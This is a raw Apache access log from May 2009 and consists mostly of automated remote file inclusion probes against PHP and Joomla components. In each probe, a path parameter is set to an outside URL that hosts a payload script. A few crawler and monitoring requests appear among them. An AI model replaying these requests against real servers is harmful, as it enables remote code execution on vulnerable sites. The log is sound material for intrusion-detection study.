122.116.178.20 - - [08/May/2009:00:12:06 -0400] "GET /logs/access_log.Q108081200%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:12:18 -0400] "GET /logs/access_log.Q108081200//modules/vwar/admin/admin.php?vwar_root=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:12:18 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:12:18 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:12:24 -0400] "GET /logs/access_log.Q108090700//modules/vwar/admin/admin.php?vwar_root=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.0.109.129 - - [08/May/2009:00:12:27 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
124.0.109.129 - - [08/May/2009:00:12:27 -0400] "GET /e404.php?DOCUMENT_ROOT=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
124.0.109.129 - - [08/May/2009:00:12:27 -0400] "GET /logs/access_log.Q108103100/e404.php?DOCUMENT_ROOT=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:00:12:38 -0400] "GET /logs/error_log.Q108122800//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.812"
124.0.109.129 - - [08/May/2009:00:12:39 -0400] "GET /logs/access_log.Q109010300/e404.php?DOCUMENT_ROOT=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
88.84.128.40 - - [08/May/2009:00:12:51 -0400] "GET /logs/error_log.Q108122800//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
66.249.72.114 - - [08/May/2009:00:13:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0054C941703009000C2C05Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.197.162.90 - - [08/May/2009:00:13:44 -0400] "GET /logs/access_log.Q109010400/?config[root_dir]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
91.197.162.90 - - [08/May/2009:00:13:44 -0400] "GET /?config[root_dir]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
91.197.162.90 - - [08/May/2009:00:13:44 -0400] "GET /logs/?config[root_dir]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 200 480 "-" "libwww-perl/5.805"
91.197.162.90 - - [08/May/2009:00:13:57 -0400] "GET /logs/access_log.Q109032900/?config[root_dir]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
72.30.142.94 - - [08/May/2009:00:14:39 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.144.220.245 - - [08/May/2009:00:14:56 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 200 486 "-" "libwww-perl/5.803"
82.144.220.245 - - [08/May/2009:00:14:56 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.803"
66.249.72.114 - - [08/May/2009:00:15:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E54B7000F100073C043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.52.107.130 - - [08/May/2009:00:15:05 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.814"
209.59.12.99 - - [08/May/2009:00:15:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.52.107.130 - - [08/May/2009:00:15:05 -0400] "GET /phphtml.php?htmlclass_path=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.814"
74.52.107.130 - - [08/May/2009:00:15:05 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.814"
121.254.231.239 - - [08/May/2009:00:15:08 -0400] "GET /logs/access_log.Q108081200%20%20//modules/vwar/admin/admin.php?vwar_root=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:15:08 -0400] "GET /logs/access_log.Q108090700%20%20//modules/vwar/admin/admin.php?vwar_root=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:15:13 -0400] "GET /images/items/index5_pliers_over.jpg HTTP/1.1" 200 1833 "-" "Googlebot-Image/1.0"
74.52.107.130 - - [08/May/2009:00:15:17 -0400] "GET /logs/access_log.Q108092600/phphtml.php?htmlclass_path=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.814"
200.32.100.130 - - [08/May/2009:00:15:19 -0400] "GET /logs/access_log.Q109042500/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:00:15:22 -0400] "GET /logs/access_log.Q108121300/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.15.206.26 - - [08/May/2009:00:15:26 -0400] "GET /logs/access_log.Q108102400/index.php?p=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.206.26 - - [08/May/2009:00:15:26 -0400] "GET /index.php?p=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.206.26 - - [08/May/2009:00:15:26 -0400] "GET /logs/index.php?p=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
84.54.137.9 - - [08/May/2009:00:15:39 -0400] "GET /logs/error_log.Q109042400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
84.54.137.9 - - [08/May/2009:00:15:40 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
84.54.137.9 - - [08/May/2009:00:15:40 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
66.249.72.114 - - [08/May/2009:00:15:45 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0058EE471250B9006FAB06G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.0.109.129 - - [08/May/2009:00:16:02 -0400] "GET /logs/access_log.Q108103100%20%20/e404.php?DOCUMENT_ROOT=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.109.129 - - [08/May/2009:00:16:04 -0400] "GET /logs/access_log.Q109010300%20%20/e404.php?DOCUMENT_ROOT=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:00:16:12 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:00:16:12 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:00:16:12 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.812"
88.84.128.40 - - [08/May/2009:00:16:16 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:00:16:16 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:00:16:16 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
69.89.31.105 - - [08/May/2009:00:16:20 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.812"
88.84.128.40 - - [08/May/2009:00:16:23 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
217.199.222.19 - - [08/May/2009:00:16:34 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.199.222.19 - - [08/May/2009:00:16:34 -0400] "GET /logs/access_log.Q109042600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.199.222.19 - - [08/May/2009:00:16:34 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:16:59 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:16:59 -0400] "GET /logs/access_log.Q109041500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:16:59 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.52.107.130 - - [08/May/2009:00:17:04 -0400] "GET /phphtml.php?htmlclass_path=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.814"
66.249.72.114 - - [08/May/2009:00:17:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E54B7F607100042C043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.11.230.36 - - [08/May/2009:00:17:23 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:00:17:23 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:00:17:23 -0400] "GET /logs/error_log.Q109042400%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [08/May/2009:00:17:50 -0400] "GET /logs/error_log.Q109042400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:00:17:52 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:00:17:52 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:00:18:01 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:00:18:15 -0400] "GET /logs/access_log.Q108091300//include/admin.lib.inc.php?site_path=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:18:27 -0400] "GET /logs/access_log.Q109041500%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:00:18:28 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:00:18:28 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:18:44 -0400] "GET /logs/access_log.Q109041900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.144.44.36 - - [08/May/2009:00:18:45 -0400] "GET /logs/access_log.Q109042500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:18:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0054C9417FB089000B1C05Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [08/May/2009:00:18:52 -0400] "GET /images/over-index2_csblades.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
218.249.36.194 - - [08/May/2009:00:18:57 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:00:18:57 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.204.25.53 - - [08/May/2009:00:19:03 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:00:19:03 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
218.38.243.71 - - [08/May/2009:00:19:04 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [08/May/2009:00:19:05 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [08/May/2009:00:19:05 -0400] "GET /logs/access_log.Q109042200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
203.249.84.246 - - [08/May/2009:00:19:32 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.249.84.246 - - [08/May/2009:00:19:32 -0400] "GET /logs/error_log.Q109042400%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.249.84.246 - - [08/May/2009:00:19:32 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:19:38 -0400] "GET /logs/access_log.Q109041500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:19:38 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:19:38 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
110.45.145.92 - - [08/May/2009:00:19:43 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:00:19:43 -0400] "GET /logs/access_log.Q109041500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:00:19:43 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
62.116.168.108 - - [08/May/2009:00:19:45 -0400] "GET /logs/access_log.Q109041500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:00:19:45 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:00:19:45 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
88.84.128.40 - - [08/May/2009:00:19:56 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:00:19:57 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
209.59.12.99 - - [08/May/2009:00:20:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.249.84.246 - - [08/May/2009:00:20:14 -0400] "GET /logs/error_log.Q109042400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:20:17 -0400] "GET /logs/access_log.Q109041500%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.145.92 - - [08/May/2009:00:20:18 -0400] "GET /logs/access_log.Q109041900//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
66.197.202.64 - - [08/May/2009:00:20:22 -0400] "GET /logs/access_log.Q109041900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:20:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0054C9417050D9000F2C05Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.89.31.105 - - [08/May/2009:00:20:52 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:00:20:52 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.812"
218.38.243.71 - - [08/May/2009:00:20:54 -0400] "GET /logs/access_log.Q109041800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:00:21:40 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:00:21:40 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.197.202.64 - - [08/May/2009:00:22:10 -0400] "GET /logs/access_log.Q108100100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:22:10 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:00:22:18 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.249.72.114 - - [08/May/2009:00:22:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E8487D804300C66C041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.44.32 - - [08/May/2009:00:22:45 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:00:22:45 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:00:22:45 -0400] "GET /logs/error_log.Q109042400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:00:22:51 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:00:22:51 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
222.236.44.32 - - [08/May/2009:00:22:51 -0400] "GET /logs/error_log.Q109042400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
121.254.231.239 - - [08/May/2009:00:22:52 -0400] "GET /index.php?page=&lang=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:22:52 -0400] "GET /logs/index.php?page=&lang=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:22:52 -0400] "GET /logs/access_log.Q108052300/index.php?page=&lang=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:23:00 -0400] "GET /logs/access_log.Q108100700/index.php?page=&lang=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.239.42.208 - - [08/May/2009:00:23:09 -0400] "GET ///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/bh.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:00:23:41 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
122.116.178.20 - - [08/May/2009:00:23:51 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:23:52 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:23:52 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
